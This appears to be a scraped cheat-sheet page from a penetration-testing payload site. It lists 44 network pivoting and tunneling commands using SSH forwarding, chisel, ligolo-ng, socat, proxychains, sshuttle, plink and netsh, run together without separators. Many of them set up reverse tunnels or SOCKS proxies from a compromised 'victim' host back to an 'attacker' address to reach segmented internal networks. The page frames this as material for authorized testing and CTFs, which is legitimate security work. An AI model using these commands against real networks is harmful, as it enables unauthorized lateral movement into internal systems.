Network pivoting and tunneling reference: SSH local/remote/dynamic port forwarding, chisel, ligolo-ng, socat relays, proxychains, and SOCKS to reach segmented internal networks. (44 payloads)
ssh -L 8080:127.0.0.1:80 user@pivotssh -L 3306:10.10.10.5:3306 user@pivotssh -L 0.0.0.0:8080:10.10.10.5:80 user@pivotssh -N -f -L 445:10.10.10.5:445 user@pivotssh -L 8443:internal.corp:443 -L 5985:dc01:5985 user@pivotsmbclient -L //127.0.0.1 -p 445 -U userssh -R 9001:127.0.0.1:9001 user@attackerssh -R 8888:10.10.10.5:80 user@attackerssh -R 1080 user@attackerssh -N -R 0.0.0.0:3389:10.10.10.5:3389 user@attackerssh -R 2222:127.0.0.1:22 user@attackerGatewayPorts yesssh -D 1080 user@pivotssh -N -D 0.0.0.0:1080 user@pivotssh -D 1080 -J jumphost user@pivotproxychains nmap -sT -Pn -n 10.10.10.0/24proxychains crackmapexec smb 10.10.10.0/24curl --socks5-hostname 127.0.0.1:1080 http://internal/chisel server -p 8080 --reverse # attackerchisel client 10.10.14.2:8080 R:socks # victimchisel client 10.10.14.2:8080 R:3389:10.10.10.5:3389chisel client 10.10.14.2:8080 R:8000:127.0.0.1:8000chisel server -p 443 --reverse --tls-domain x.comchisel client --auth user:pass --keepalive 25s host:8080 R:sockssudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up./proxy -selfcert -laddr 0.0.0.0:11601 # attacker./agent -connect 10.10.14.2:11601 -ignore-cert # victimsession → startsudo ip route add 10.10.10.0/24 dev ligololistener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444sudo ip route add 240.0.0.1/32 dev ligolosocat TCP-LISTEN:8080,fork,reuseaddr TCP:10.10.10.5:80socat TCP-LISTEN:9001,fork TCP:127.0.0.1:9001 &socat TCP-LISTEN:443,fork,reuseaddr OPENSSL:attacker:443,verify=0socat TCP-LISTEN:1080,fork SOCKS4A:127.0.0.1:%h:%p,socksport=9050mknod /tmp/f p; nc -lvp 8080 < /tmp/f | nc 10.10.10.5 80 > /tmp/frinetd / portfwd (Meterpreter)socks5 127.0.0.1 1080proxy_dnsdynamic_chainproxychains4 -f ./pc-hop2.conf nmap -sT -Pn 172.16.0.0/24sshuttle -r user@pivot 10.10.10.0/24plink.exe -R 1080 -l user -pw pass attackernetsh interface portproxy add v4tov4 listenport=3389 connectaddress=10.10.10.5 connectport=3389Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 44 Pivoting payloads for testing Pivoting & Port Forwarding vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Network Recon & Exploitation to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Pivoting payloads are completely free, with no account required. Everything runs in your browser.